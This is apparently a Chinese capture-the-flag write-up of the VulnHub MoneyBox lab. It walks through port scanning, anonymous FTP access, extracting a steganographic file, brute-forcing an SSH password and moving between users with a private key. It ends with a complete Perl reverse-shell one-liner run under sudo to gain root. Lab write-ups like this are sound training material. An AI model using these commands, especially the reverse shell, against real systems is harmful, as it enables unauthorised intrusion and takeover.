靶场下载地址:
http://www.vulnhub.com/entry/moneybox-1,653/#download
信息搜集
一、Nmap进行扫描
nmap -sP 192.168.128.0/24 #对自己的靶机网段进行存活探测,获取靶机地址
nmap -T4 -A -p- 192.168.128.135 #对目标进行全端口扫描
通过端口扫描,发现目标开启了21、22、80端口
二、21端口利用
通过nmap扫描发现21端口允许匿名登录
FTP的匿名登录一般有三种:
1、 用户名:anonymous 密码:anonymous 或者 空
2、 用户名:FTP 密码:FTP 或者 空
3、 用户名:USER 密码:pass
# 进行匿名登录
ftp 192.168.128.135
anonymous
通过匿名登录发现目录下存在一张图片,并且无法查看其他目录的内容
# 下载图片进行查看
get trytofind.jpg
图片如下:
猜测此文件可能存隐写
使用steghide进行查看
steghide extract -sf trytofind.jpg
因需要输入密码,所以先放弃
三、80端口web探测
对目标目录进行扫描,使用dirsearch工具:
python dirsearch.py -u http://192.168.128.135/ -e *
发现存在以下目录:
http://192.168.128.135/blogs/
访问http://192.168.128.135/blogs/,查看源码发现一个新的目录
S3cr3t-T3xt
对目录S3cr3t-T3xt进行访问,发现源码中存在密钥
3xtr4ctd4t4
猜测此密钥为之前获取到的图片密钥
发现图片隐写了data.txt文件
查看此文件发现是一份邮件类似的内容,获取到用户名renu用户
尝试对renu用户ssh服务进行暴力破解
爆破出renu用户的密码为:987654321
# 使用ssh连接登录目标服务器
ssh renu@192.168.128.135
通过常规的探测,未发现可提权的方法
通过查看histor查看到目标使用私钥文件登录过其他用户
cd .ssh
ssh -i id_rsa [email protected]
成功登录到lily用户
经过探测发现lily存在无需密码验证即可sudo使用perl语言的权限
使用perl脚本进行提权反弹shell
sudo perl -e 'use Socket;$i="192.168.128.133";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
成功提权,获取到flag
原文始发于微信公众号(渗透笔记):MoneyBox靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论